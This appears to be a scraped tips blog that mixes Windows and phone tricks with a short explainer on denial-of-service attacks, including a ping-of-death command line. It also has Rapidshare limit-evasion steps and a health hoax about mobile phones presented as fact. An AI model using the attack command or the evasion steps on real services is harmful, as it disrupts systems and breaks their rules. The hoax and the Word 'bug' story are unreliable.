A denial of service (dos) attack is an attack that clogs up so much memory on the target system that it can not serve it's users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attacks as discussed below:

1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.

10 Basic Tips For the Internet Explorer (IE)

10 Basic Tips For the Internet Explorer (IE)

In order to use the Internet Explorer (IE) effectively, we have some basic tips for you to try… Ok let’s go now.


1. To extend the window area of the IE, you can make it easy by pressing the F11 key. Then you press it again in order to return the IE to the normal window.


2. Sometimes you want to search a keyword in a long web page that you are surfing. How do you do ?? Just press Ctrl+F and place the keyword you want.


3. Using Backspace key in your keyboard instead of clicking Back in the IE window.


4. You can close your IE window that you are surfing by Ctrl+W.


5. To see the surfing websites history, Press F4 key to see the URL which you have typed.


6. Press Ctrl+D in order to save the url which you are surfing. And the url will be in the Favorites.


7. To send a web page to your friend. Do you know we can send it by email from the IE’s tools ? Let you try it, go to File > Send > Page by E-mail...


8. To slide the web page by using the keyboard, try it with the arrow keys. To slide it to the bottom and the top of the web page, try the End and Home key.


9. If you find a picture that you prefer it to be the desktop wallpaper, you can immediately set it, right click on the picture area and select the Set as wallpaper.


10. To slide the web page gradually, you may use the Page up, Page down and Spacebar keys. Try it !

MS Word unbelievable bug

MS Word unbelievable bug

This is something pretty cool and unbelievable.
At Microsoft, the whole team, including Bill Gates, couldn't answer as to why this happened!

It was discovered by a Brazilian.
Try it out yourself.

Open Microsoft Word and type = rand (200,99)

and then press ENTER


u can get some around 80 pages of text

Customize Windows Media Player Title Bar

Customize Windows Media Player Title Bar

Change the title bar to read Windows Media Player provided by , so if I had entered text LOKESH , it would read: Windows Media Player provided by Er. Faisal.

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Policies\Microsoft Create the Key [WindowsMediaPlayer] Create String value named [TitleBar]

Data Type: REG_SZ // Value Name: TitleBar Double click TitleBar and Enter the text to be displayed in the title bar.

Exit Registry / Reboot

Contact The Site Owner

Contact Er. Faisal

Your Name
Your Email Address
Subject
Message
Image Verification
Please enter the text from the image
[ Refresh Image ] [ What's This? ]

Creating Shutdown, Restart and Logoff Icons

Creating Shutdown, Restart and Logoff Icons

To create the icons, create a shortcut on the desktop.

For Shutdown, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows

For Restart, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec

For Logoff, the command is C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0

Creating 3D Window Effect

Creating 3D Window Effect

You can create a nice 3D effect for your windows

1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Colors
3. Make sure the following setting are there:

* ButtonHilight=128 128 128
* ButtonShadow=255 255 255

Restoring a Lost Desktop

Restoring a Lost Desktop

If you ever lose the Desktop but Explorer is still running with the Start Button,
you can do this to bring back your Desktop in a Windows box.

1. Click Start.
2. Click Run.
3. Type a period " . "
4. Then press Enter.

Prioritize Your Important Applications

How To Prioritize Your Important Applications?

We do multitasking all the time with our PC right? How unfair it would be to lose a CD while burning your favorite songs just because you were watching a video at the same time and the processor couldn't take the load?

Here is your solution:

1. Press CTRL-SHIFT-ESC.
2. Go to the second tab called Processes
3. Right click on one of the active processes, you will see the Set Priority option
4. For e.g., Run your CD writer program, set the priority higher, and no more wasted cd from now on. Happy???

Delete Annoying Multiple Entries in Boot Screen

How To Delete Annoying Multiple Entries in Boot Screen?

Suppose you have multiple copies of Windows XP installed in your PC in different drives or installed Windows XP on top of another operating system like Windows 98 or Windows 2000. Now, though you may have removed some or all of the older versions, still the boot screen continues to show the old operating system entries. Isn't it annoying and confusing to remember and select every time the only right option? Don't worry, here is how you can get rid of the problem forever:

1. Load windows and login if required
2. Go to Start menu, click on Run and then type cmd. This open up the command window.
3. Type this command:
bootcfg /delete /id x
where x is the number of the option you want to delete. Say, for example, you want to delete 2nd boot option then you will type bootcfg /delete /id 2 and so on.
4. Now reboot the machine to check that you have only the correct option(s) available.

Note:

* Please be careful in step 3 and don't delete the correct operating system because that will prevent you from booting.

* Repeat step 3 to delete all unnecessary operating system menus.

Remove Shortcut Arrows

How to Remove Shortcut Arrows?

Give Desktop Icons a Better Look

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.

1. Go to registry by clicking on Start menu -> run and type regedit
2. Navigate to HKEY_CLASSES_ROOT -> lnkfile
or
Press CTRL+F and then at the search box type lnkfile and search.
3. Delete the IsShortcut registry value.

You may need to restart Windows XP.

NOTE:- Its always good to be on the safer side before modifying registry settings and make backups.

Can be done with softwares also like TUNE-UP UTILITIES.

How To Block Websties

How To Block Websties Without Software?

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--

For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then add like before.
IE: 127.0.0.3 www.blablabla.com127.0.0.4 www.blablabla.com127.0.0.5 www.blabla.com

Shutdown PC in 3 Seconds

Shutdown PC in 3 Seconds

Press CTRL + ALT + DELETE {To Open Task Manager}

Now Hold CTRL {Keep Holding Until PC Shuts Down}

Click On SHUTDOWN In Task Manager {Given as a Tab}

Then Click On TURN OFF

PC Will Shut Down in 3 Seconds {You Can Count}

Kill the Rapidshare Time

Kill the Rapidshare Time

Now u can kill the rapidshare time by just following the simple steps.

1) Log on to rapidshare page .

2) You get the rapidshare times countdown.

3)At that time just paste the “javascript:alert(c=0)” without quotes in the url.

4) You have kill the time, now download immediately.

Enable Task Manager

How To Enable Task Manager?

GUIDE--->

Click Start.
Click Run.
Type REGEDIT.
Click OK The Registry Editor will now open.
Browse to the following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system
In the right pane, look for the value: DisableTaskMgr
Right click DisableTaskMgr and select Delete. (When prompted with "Are you sure you want to delete this value", select Yes.
Close the Registry by choosing
You should now be able to access Task Manager. If not, reboot into Safe Mode and repeat the steps outlined above.

WHEN VIRUS ENTERS THE PC, IT DISABLES TASK MANAGER.

THIS IS VERY HELPFUL @ THAT TIME.

SPEED-UP MENUS

SPEED-UP MENUS

1. Click Start, and then click Run.

2. Type Regedit in the box, and then click OK.

3. Expand the menu in the left panel and select the HKEY_CURRENT_USER\Control Panel\Desktop folder.

4. Scroll down in the right panel and double click on the MenuShowDelay file.

5. In the Value Data box, change to default value for the menu speed from 400 to a lesser number, such as 1.

6. Click OK.

Caution: Incorrectly editing the registry may severely damage your system. Before making changes to the registry, you should back up any valued data on your computer.

Hide the Text Below Desktop Icons

Hide the Text Below Desktop Icons

Some icons you use so regularly that you don’t need that annoying text below the icon. A good example of this is Internet Explorer or Mozilla Firefox. We all know what those icons look like. To remove that text, just follow these instructions.

Right-click on the shortcut icon, and choose Rename. Now hold down the Alt key and type in 255 on the keypad to the right of the keyboard. You can’t use the number keys right above the keyboard. If you have a laptop, you can turn on Numlock and then use the little number keys next to the regular letters.

The way this works is that the Alt+255 character is blank, so the shortcut filename is actually just named with a character that is completely blank. For the first shortcut on the desktop, you would use Alt+255, but for the next shortcut, you’ll have to enter the combination twice (Alt+255, Alt+255). For the third, three times… and so on. This is because you can’t name two different shortcuts or files the same thing. Entering Alt+225 twice would give you two blanks instead of one.

Now we have a beautiful icon, with no text underneath it!

Multiple logins in your Yahoo! Messenger

Multiple logins in your Yahoo! Messenger

To enable multiple logins in you Yahoo! Messenger, Follow these steps :

*Click Start Menu And Click On “RUN”

*Type “regedit” and click OK

*You will see the REGISTRY EDITOR

*Navigate to “ HKEY_CURRENT_USER/Software/Yahoo/Pager/Test “

*Here in right side panel, right click to create a new Dword value with name Plural and give it value 1.

*Close the registry editor and enjoy multiple yahoo logins.

Prevent Users From Writing to USB

Prevent Users From Writing to USB

If you have windows XP with SP2, then you can disable the writing option to USB drives. This trick is very useful if you have virus in your computer and want to copy files from a USB Drive but don’t want to transfer virus to the USB. Follow the given steps to disable the USB writing option:

To edit the computer registry, first you should log onto your computer with administrative rights.

First click on Start button and type “Regedit” in Run option.

Here locate the location to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

Here in right side panel, click right to create a key with the name “StorageDevicePolicies”.

Now in left side panel, select “StorageDevicePolicies” key, again right click to create new DWORD value then label it “WriteProtect”. Set its value to “1?. But again to enable writing, set its values to “0?.

Now close the registry editor and restart your computer after any changes to go into effect.

Restore Previously Open Folders After Shutdown

Restore Previously Open Folders After Shutdown

If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.

By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.

Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.

* To edit this feature, you will need to be logged into your computer with administrative rights.
* First click on Start button then go to Control Panel.
* Open the “Appearance and Themes” option in control panel then click on Folder Options.
* A small windows dialog box will appear with the title “Folder options”, click on View tab.
* Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
* Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.

Download Ebooks from Google

Download Ebooks from Google

You all know that Google.com is the most popular search engine in the world.
So, I present to you some tips that will help you to find ebooks with Google.

First you need to find Apache's (default) Index page and try this query -
Quote: +("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +apache


If you want to find a particular ebook file then try this query -
allinurl: +(rar|chm|zip|pdf|tgz) TheTitle of the book

Merging video files with simple DOS command

Merging video files with simple DOS command

Click start > run

type cmd and press enter. this will open the command prompt.

In the command prompt, type
copy /b "D:\video1.flv" + "D:\video2.flv" "D:\FullMovie.flv"

where the video1.flv and video2.flv are the video files to join and FullMovie.flv is the resultant combined file.

You can specify any number of files to join.

Also notice I have typed the entire file path in the above command.

Press enter and the files will be joined.

Editing The Right Click Menu In Windows XP

Editing The Right Click Menu In Windows XP

When you install some softwares, they add their own options to the right click menu.
This can slow down the system as it needs to get all the files ready when you right click.
Especially, the compression tools like WinRar & WinZip add their options to the right click menu. A lot of options in the right click menu makes it look untidy too.
If you don't need some of the options, then you can customize the menu.
One way is through Registry editing. Here is the Registry Setting.

1. Go to Run and type in Regedit.

2. Go to HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers
This is the where programs attach to right click menu,This is a universal right click.
To make the specific right clicks, you need to go to specific type of file in this section.

3. You simply delete the keys you do not want.If you don't want to edit the registry,
you can use a editing software with which things can be done with much ease and in a
detailed manner.There is also a software named File Menu Tools through which you
can edit your right click menu. Through this software you can add more options provided
by the software, and you can remove the contents you want.The only thing is that you
should know which files to look for and editing which file will make the correct changes.

DOWNLOAD: http://www.lopesoft.com/en/fmtools/download.html

Try out this software & customize your right click menu according to your own needs.

Be care while using your mobile phone

Be care while using your mobile phone...

When you try to call someone through mobile phone,don't put your
mobile closer to your ears until the recipient answers. Because
directly after dialling, the mobile phone would use it's maximum
signalling power, which is: 2 watts = 33dbi, Plz Be Careful, Message
as received (Save your brain) Please use left ear while using cell
(mobile), because if you use the right one it will affect brain
directly.
This is a true fact from Apollo medical team.

Please spread this useful information around
SAFETY BY ALL FOR ALL

How to disable a STOLEN mobile phone?

How to disable a STOLEN mobile phone?

To check your Mobile phone's serial number, key in the following
digits on your phone:
* # 0 6 #
A 15 digit code will appear on the screen.
This number is unique to your handset.
Write it down and keep it somewhere safe.
when your phone get stolen, you can phone your service provider and give them
this code.
They will then be able to block your handset so even if the thief changes the
SIM card, your phone will be totally useless.

You probably won't get your phone back, but at least you know that
whoever stole it can't use/sell it either.

Operate mouse point with keyboard

Operate mouse point with keyboard

If your mouse is not working, this tip will be useful.

go to start>run>type access.rpl, this opens accessibility optation window and go to the mouse tab > and choose the use mouse keys optation click apply or ok.

Now u can operate the mouse point with right side numerical key 4 8 6 2 5 7 9 on your keyboard.

IF YOU ALREADY KNOW THIS, SORRY, BUT IT WILL BE USEFUL FOR NOVICE PERSONS...

Have Fun With The Command Prompt

Have Fun With The Command Prompt

Here’s a cheap trick to amuse yourself when you get bored.

Open a command prompt (Start, Run, cmd, OK) and enter the following command:

title yourname

Press enter

then check out the title bar of the command window.

Cannot Access Regedit

Cannot Access Regedit, How to Fix It?

Many times when working on a computer that has been infected with a virus, trojan, or piece of spyware I find myself with my most important command, Regedit, the Windows Registry Editor being disabled. Virus creators like to disable the Registry Editor so it makes solving the problem and removing the issue difficult.Sometimes administrators in IT departments may place restrictions on using the regedit command to keep employees from changes things on company computers, but viruses and other issues may also try to disable it.
Listed below you will find the different ways to enable regedit, the Registry Editor.

First we’ll begin with the method that appears to work the best.

Method 1: Use Symantec’s tool to reset

Sometimes worms and trojans will make changes to the shell\open\command registry entries as part of their infections. This will cause the virus to run each time you try to run an .exe file such as the Registry Editor. In these cases, visit Symantec’s website and download the UnHookExec.inf file to your desktop. Right-click on it and choose Install. Restart your computer and then try to open the Registry Editor.


Method 2: Rename Regedit.com to Regedit.exe

Some viruses and other malware will load a regedit.com file that is many times a zero byte dummy file. Because .com files have preference over .exe files when executed if you type REGEDIT in the run line, it will run the regedit.com instead of the real regedit.exe file.
Delete the regedit.com file if its a zero byte file to restore access to REGEDIT. In some cases, such as the W32.Navidad worm, you’ll need to rename the REGEDIT file to get it to work.


Method 3: Windows XP Professional and Group Policy

If you have Windows XP Professional and access to an administrative user account, you could change the registry editor options in the Group Policy Editor.
Click Start, Run
Type GPEDIT.MSC and Press Enter
Go to the following location
User Configuration->Administrative Templates->System
In the Settings Window, find the option for “Prevent Access to Registry Editing Tools” and double-click on it to change.
Select Disabled or Not Configured and choose OK.
Close the Group Policy Editor and restart your computer.
Try opening REGEDIT again.

Rapidshare Tricks

Rapidshare Tricks :

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

Step [A] Short-Out the JavaScript:

1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

Step [B] Request a new IP address from your ISP server:

Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
Note:If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

Step [C] Use a proxy with SwitchProxy and Firefox:

1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

Step [D] You can use a bookmarklet to stop your wait times:

1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait


Save Yourself Against Hacks

How to Save Yourself against Hacking?

I suggest you use NoScrpt addon to browse safely browse orkut and remove all unwanted addon inorder to ensure the safety of your account Also install a powerful antivirus and scan your system once. In this case i recomond you to use norton and spyware doctor which comes as a part of our google pack for the safety of your account

~Do 1st ~
*************

[1] Change your Google Account Password regulalrly and never reuse that again in future.
[2] Always sign out when you've finished reading your mail and only select Remember me option if you're signing in from a personal computer.
[3] Clear forms, passwords, cache, and cookies in your browser on a regular basis - especially on a public computer.
[4] Keep secrets! Never tell anyone your password, or your secret question and answer; if you do tell someone, change it as soon as possible .

~ Do Never ~
****************

[1] Do not run any script while orkutting .
[2] Do not click any unknown link on orkut.
[3] Do not post ORKUT-SCRAPS from outside ORKUT. (e.g.: http://www.orkutstyle.com | http://www.123orkut.com |http://www.Orkut-Scrapping.com).
[4] Do not use other sites to access ORKUT or GMAIL. (e.g.: www.Powerscrap.com | http://www.Way2SMS.com).

Learn about protecting your profile here => http://help.orkut.com/support/bin/answer.py?answer=57442

I advise you not to run javascripts or log in to third party sites to scrap all your friends or to increase your scrap count.

What can I do If my profile is hacked?

Take a look on this page select appropriate option from this page which will guide you!!!

http://help.orkut.com/bin/static.py?page=troubleshooter.cs&problem=account_compromised&master=account_compromised&Action.Search=Continue&hl=en-US&p=FlagProfile.aspx

If your account has been taken over by means of phishing then go to support page over here and fill the form https://www.google.com/support/accounts/bin/request.py?ara=1&hl=en

Ways that Google detects Invalid clicks

Invalid Clicks Detection

We always hear that Google has a sophisticated system to detect the invalid clicks, and result in termination of the cheaters' account. But, how can Google do that? In this post, I summarize those ways that Google depends on to detect whether the clicks on your site are invalid or not. Google will not first ban your account immediately. Rather, they will first flag your account and Google will keep a closer eye to your account. In some occasion, they may send you a warning letter to notify your situation; but sometimes not.

1. IP Address

It is the easist and must be recognized by everyone. If those clicks on your ads are originated from the same IP Address as the one used for accessing your AdSense account, your account is flagged.

2. Click Through Rate (CTR)

Normally, Click thru Rate should not excees 10%. Otherwise, Google will flag your account. For your information, normal CTR should ranges from 0.5% - 10%.

3. Physical Location

Google has good tracing software and technology.They can trace traffics origin down to the small town. So, using different computers with different IP address does not secure anything. So, don't try to click your ads in various internet cafes. That will kill you.

4. Cookies

Most home users do not use static IP Address for Internet connection. In most cases just disconnect and reconnect will give you a new IP Address. But don't forget, Google has set cookies on your computer. They can trace these cookies and see whether they originate from the same computer.


5. Click Pattern 1

It is also suspicious when people click on their clicks and then run away immediately (hit-and-run). But normally, people will surf for a while inside your pages and then click on the ads they want.


6. Click Pattern 2

why this computer / IP address / person is so trigger-click-happy on this particular website but never click on the ads on other sites?
7. Click Pattern 3

And why is it that people accessing these sites direct (type-in URL or from bookmark) tend to be very active ad-clickers compared with those referred from search engine or other sites?

8.Other Google Services

Apart from Google Adsense, Google also provide a series of services to us. Don't just think that it is safe if you do not log in your adsense account and click on your ads. What other Google services do they provide to us? Here are some: Gmail (most poeple are using it), Google Earth, Google Calendar, Google Search, Google Toolbar, Google Talk, Google Sitemap, Google Desktop, Blogger, or even Youtube (coz Google has just recently acquired it).

9. Search Engine Ranking

Your website is not indexed on any search engine, not linked by any prominent website, but get consistently high traffic? How come people can access your website and click your ads? That will make Google to smell a rat.


10. Webpage design

How about the "Please click a link below" or "donate us by clicking the ads"? These kinds of encouragement is not in line with Google's TOS. Google can use their winning search engine, or even human eyes to check your sites from time to time.


11. Advertisers conversion rate

Ad click is one thing. But does it bring value to the advertisers? If none of the clicks on your site translate to conversion to the advertiser, you are in trouble. First the Smart-Pricing hits, then your AdSense account disabled.

Remove Extra OS From Boot Menu

HOW TO REMOVE EXTRA OS FROM BOOT MENU!!!

If you have more then one operating system installed or wish or sometime when your windows got damaged u install a new OS on another drive then this damaged OS is on the menu
to remove an operating system from the boot menu, you can use the following information:--

1.Click on Start, Control Panel, System, Advanced.

2.Under Startup and Recovery, click Settings.

3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
-or-
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".

5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT".

NOTE-press F5 while booting for these menu in BOOT MENU at that time.

Nokia Universal Codes

Nokia Universal Codes

Code Description :
These Nokia codes will work on most Nokia Mobile Phones:----

(1) *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370#

(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.

(4) *#4720# Deactivate Half Rate Codec.

(5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type.

(6) *#9999# Phones software version if *#0000# does not work.

(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number).

(8) #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w"
and "+" symbols).

(9) #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w"
and "+" symbols).

(10) #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w"
and "+" symbols).

(11) #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w"
and "+" symbols).

(12) *#147# (vodafone) this lets you know who called you last.

(13) *#1471# Last call (Only vodofone).

(14) *#21# Allows you to check the number that "All Calls" are diverted to

(15) *#2640# Displays security code in use.

(16) *#30# Lets you see the private number.

(17) *#43# Allows you to check the "Call Waiting" status of your phone.

(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.

(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls
are diverted to.

(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.

(21) *#67705646# Removes operator logo on 3310 & 3330.

(22) *#73# Reset phone timers and game scores.

(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible.

(24) *#7760# Manufactures code.

(25) *#7780# Restore factory settings.

(26) *#8110# Software version for the nokia 8110.

(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.

(28) *#94870345123456789# Deactivate the PWM-Mem.

(29) **21*number# Turn on "All Calls" diverting to the phone number entered.

(30) **61*number# Turn on "No Reply" diverting to the phone number entered.

(31) **67*number# Turn on "On Busy" diverting to the phone number entered.

(32) 12345 This is the default security code.

press and hold # Lets you switch between lines....


NOKIA5110/5120/5130/5190

IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+1
Network lock status #pw+1234567890+2
Provider lock status: #pw+1234567890+3
SimCard lock status: #pw+1234567890+4
NOKIA 6110/6120/6130/6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #


NOKIA3110

IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #

NOKIA 3330

*#06#
This will show your warranty details *#92702689#
*3370#
Basically increases the quality of calling sound, but decreases battery length.
#3370#
Deactivates the above
*#0000#
Shows your software version
*#746025625#This shows if your phone will allow sim clock stoppage
*4370#
Half Rate Codec activation. It will automatically restart
#4370#
Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings
To do this simply use this code *#7780#
Manufacturer Info
Date of Manufacturing *#3283#
*3001#12345# (TDMA phones only)

This will put your phone into programming mode, and you'll be presented with the programming menu.

2) Select "NAM1"
3) Select "PSID/RSID"
4) Select "P/RSID 1"
Note: Any of the P/RSIDs will work
5) Select "System Type" and set it to Private
6) Select "PSID/RSID" and set it to 1
7) Select "Connected System ID"
Note: Enter your System ID for Cantel, which is 16401 or 16423. If you don't know yours,
ask your local dealer for it.
8) Select "Alpha Tag"
9) Enter a new tag, then press OK
10) Select "Operator Code (SOC)" and set it to 2050
11) Select "Country Code" and set it to 302 for Canada, and 310 for the US.
12) Power down the phone and power it back on again

ISDN Code

To check the ISDN number on your Nokia use this code *#92772689#

Next previous home

Connect

Bookmark and Share